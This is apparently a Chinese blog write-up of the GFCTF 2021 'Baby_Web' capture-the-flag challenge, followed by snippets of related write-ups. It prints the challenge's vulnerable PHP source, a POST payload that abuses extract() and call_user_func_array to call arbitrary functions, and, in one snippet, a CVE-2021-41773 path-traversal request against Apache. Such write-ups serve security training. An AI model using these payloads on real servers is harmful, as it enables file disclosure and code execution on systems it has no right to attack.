[GFCTF 2021]Baby_Web

最新推荐文章于 2024-04-21 21:00:00 发布
最新推荐文章于 2024-04-21 21:00:00 发布
阅读量281 收藏
点赞数 1
文章标签: 前端 php apache web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129651065
版权

1.打开环境。

用dirsearch可以扫到

 含有CVE-2021-41773漏洞,可以读取任意位置的文件。

用相关工具也可以知道:

由于源码有提示:

index.php的默认位置是(var/www/html),所以可以通过burp site抓包访问index.php.txt获取源码:

发现还有Class.php文件,同理可得Class.php的源码:

index.php:

<?php
error_reporting(0);
define("main","main");
include "Class.php";
$temp = new Temp($_POST);
$temp->display($_GET['filename']);

?>

Class.php:

<?php
defined('main') or die("no!!");
Class Temp{
    private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];
    private $template;
    public function __construct($data){

        $this->date = array_merge($this->date,$data);
    }
    public function getTempName($template,$dir){
        if($dir === 'admin'){
            $this->template = str_replace('..','','./template/admin/'.$template);
            if(!is_file($this->template)){
                die("no!!");
            }
        }
        else{
            $this->template = './template/index.html';
        }
    }
    public function display($template,$space=''){

        extract($this->date);
        $this->getTempName($template,$space);
        include($this->template);
    }
    public function listdata($_params){
        $system = [
            'db' => '',
            'app' => '',
            'num' => '',
            'sum' => '',
            'form' => '',
            'page' => '',
            'site' => '',
            'flag' => '',
            'not_flag' => '',
            'show_flag' => '',
            'more' => '',
            'catid' => '',
            'field' => '',
            'order' => '',
            'space' => '',
            'table' => '',
            'table_site' => '',
            'total' => '',
            'join' => '',
            'on' => '',
            'action' => '',
            'return' => '',
            'sbpage' => '',
            'module' => '',
            'urlrule' => '',
            'pagesize' => '',
            'pagefile' => '',
        ];

        $param = $where = [];

        $_params = trim($_params);

        $params = explode(' ', $_params);
        if (in_array($params[0], ['list','function'])) {
            $params[0] = 'action='.$params[0];
        }
        foreach ($params as $t) {
            $var = substr($t, 0, strpos($t, '='));
            $val = substr($t, strpos($t, '=') + 1);
            if (!$var) {
                continue;
            }
            if (isset($system[$var])) { 
                $system[$var] = $val;
            } else {
                $param[$var] = $val; 
            }
        }
        // action
        switch ($system['action']) {

            case 'function':

                if (!isset($param['name'])) {
                    return  'hacker!!';
                } elseif (!function_exists($param['name'])) {
                    return 'hacker!!';
                }

                $force = $param['force'];
                if (!$force) {
                    $p = [];
                    foreach ($param as $var => $t) {
                        if (strpos($var, 'param') === 0) {
                            $n = intval(substr($var, 5));
                            $p[$n] = $t;
                        }
                    }
                    if ($p) {

                        $rt = call_user_func_array($param['name'], $p);
                    } else {
                        $rt = call_user_func($param['name']);
                    }
                    return $rt;
                }else{
                    return null;
                }
            case 'list':
                return json_encode($this->date);
        }
        return null;
    }
}

 首先index.php调用display方法,$filename->$template,在extract函数(暗示了可以变量覆盖)之后,调用getTempName方法,$space->$dir,且要求$dir=admin。

访问/template/admin,发现会调用listdata方法:

 在listdata中发现危险函数call_user_fuc_array,首先,该函数将system数组化成$param,接着call_user_fuc_array会调用name元素的值执行命令。

payload:

URL?filename=index.html

(POST)space=admin&mod=m1kael action=function name=phpinfo

知识点延伸:

PHP代码审计14—变量覆盖

ha0cker
关注
【网络安全 | CTF】攻防世界 baby_web 解题详析
等风来
05-21 4966
当用户请求访问一个使用 PHP 构建的网站时,Web 服务器将会搜索该网站根目录下是否存在名为 index.php 的文件,如果找到了该文件,则会将其视为默认的初始页面文件并返回给用户。具体来说,当访问一个 URL 时,服务器返回 302 状态码和一个 Location 头部字段,该字段指示了资源被临时移动到的新 URL 地址。这两个文件名都是 Web 服务器默认的首选文件名,当用户访问一个网站时,服务器会优先寻找这些文件并返回给用户。文件是最常用的初始页面文件名,它在网站根目录下。
[GFCTF 2021]Baby_Web(复现)
qq_53460654的博客
12-20 4837
打开环境 所以要我们读取上层目录的某个文件 所以我想应该会存在任意文件读取和路径穿越漏洞 然后标签有CVE-2021-41773 所以直接github拿到这个漏洞的 工具 payload 我们来读一下index.php.txt <?php error_reporting(0); define("main","main"); include "Class.php"; $temp = new Temp($_POST); $temp->display($_GET['filename']); ?
[每日一题][GFCTF 2021]Baby_Web
Sapphire037的博客
11-26 1342
前言 坚持。复现平台https://www.ctfer.vip/ 过程 题目标签写了CVE-2021-41773,路径穿越漏洞,进入环境首先看源码 <h1>Welcome To GFCTF 12th!!</h1> <!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?--> 网上找payload,bp发包 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/index.php.txt HTTP/1.1 Hos
[GFCTF 2021]Baby_Web的CVE-2021-41773
Aiwin的博客
06-05 1660
[GFCTF 2021]Baby_Web的CVE-2021-41773
ctf-攻防世界-webbaby_web
一只菜鸟的博客
11-10 822
描述中提示想想初始页面是哪个,打开环境,默认主页在1.phpphp的初始页面一般为index.php,但是将1.php更改为index.php后,会自动跳转到1.php。 那我们改成index.php之后,使用burp进行抓包,右键send to repeater,点击go,发现显示flag is hidden,但是往上面返回包看看,可以找到flag ...
CTFbabyweb
qq_74263993的博客
03-28 409
SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。攻击内外网的Web应用,主要是使用HTTP GET请求就可以实现的攻击(比如struts2、SQli等)。看了一下大佬的wp,发现这个网站是存在一个ssrf.php文件的。
[GFCTF202021]Baby-Web只有代码审计部分
01-02
【代码审计】是一种重要的安全措施,它涉及到对程序源代码的审查,以找出潜在的安全漏洞、错误或不规范的编程实践。... 1. `strpos` 函数用于查找字符串中特定字符或子串首次出现的位置。... 2. `in_array` 用于检查数组...
GFCTF2021 Baby-Web代码审计解析:字符串与数组操作
"GFCTF202021Baby-Web题目主要涉及代码审计,题解涵盖了相关知识点。文章作者提到CSDN平台撰写文章的不便,但并未详细展开。" 在【标题】和【描述】中,我们得知这是一道关于代码审计的网络安全竞赛题目,可能...
CTF baby_web
艺博东的博客
09-25 8547
题目描述:想想初始页面是哪个 题目场景: http://220.249.52.133:49388 1、点击链接进入一下界面 2、URL:把“1.php”为“index.php”—>回车 3、查看源代码(按F12或Fn+F12) 4、点中“Network”—>点击“index.php” 5、Response Headers—>FLAG: flag{very_baby_web} 6、OK flag{very_baby_web} ...
[RootersCTF2019]babyWeb
shinygod的博客
09-19 821
知识点:报错注入,用16进制(0x)代替引号的功能
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
buu-[RootersCTF2019]babyWeb
qaq517384的博客
10-26 432
打开环境,要输对18位数字才能下一步 给了被过滤的字符 UNION|SLEEP|’|"|OR|-|BENCHMARK 在输入一个id后,会返回sql语句 惯例先试万能密码,or过滤了还有and、&&、|| 1||1=1 limit 0,1 有了,不加limit没结果, 做完题瞅一眼源码 <?php $link = mysqli_connect("database", "root", "password", "sql_injection"); if (!$link) { ec
XCTF Web 高手区001:baby_web
立志成为最会敲代码的dancer,最会locking的程序猿
04-02 374
题目: WP: 打开网页发现只有一句话 无论怎样修改URL的后缀都会跳转至1.php 此时直接F12查看源码 在Network目录下查看原地址的头信息 在响应头信息下找到flag 也可以直接burpsuite抓包查看,不过在本题下显然浏览器自带的检查更方便 ...
CTF-WEB篇 攻防世界题目实战解析baby_web
最新发布
2301_76565920的博客
04-21 871
题目:baby_web 难度:1。index.php,抓包,查看header
[RootersCTF2019]babyWeb 1 BUUCTF
wuyaowangchuan的博客
12-01 787
进入环境 随便输入一个东西 想到的是SQL注入 没有回显,应该是被过滤掉了 直接用这个试试 ?search=1 order by 1 发现可以正常回显 注意到了这个 ?search=1 order by 3 说明有2列 一个为uniqueid另一个应该就是flag 我想继续union查询的时候发现有东西被过滤掉了 输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 SELECT * FROM users WHERE uniqueid=1 || 1=1 limit 0
baby_web (攻防世界)
HackerYY的博客
11-23 3346
攻防世界baby_web 内附解题过程
CTF--baby_web
qq_40730029的博客
04-20 1797
CTF之攻防世界高手进阶题 baby_web 题目:想想初始页面是哪个 进入场景之后显示如下,跳到的是1.php,用抓包软件burpsuite抓包 在抓取到的信息右键发送到Repeater 点击GO页面如下,发现flag出现了 ...
BUUCTF:[RootersCTF2019]babyWeb
末初的CSDN博客
08-02 1604
题目地址:https://buuoj.cn/challenges#[RootersCTF2019]babyWeb SQL查询,过滤了:union、sleep、'、"、or、-、benchmark order by测试字段数,发现当order by 2时返回正常order by 3返回没有这个字段,确定为两个字段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 返回flag ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值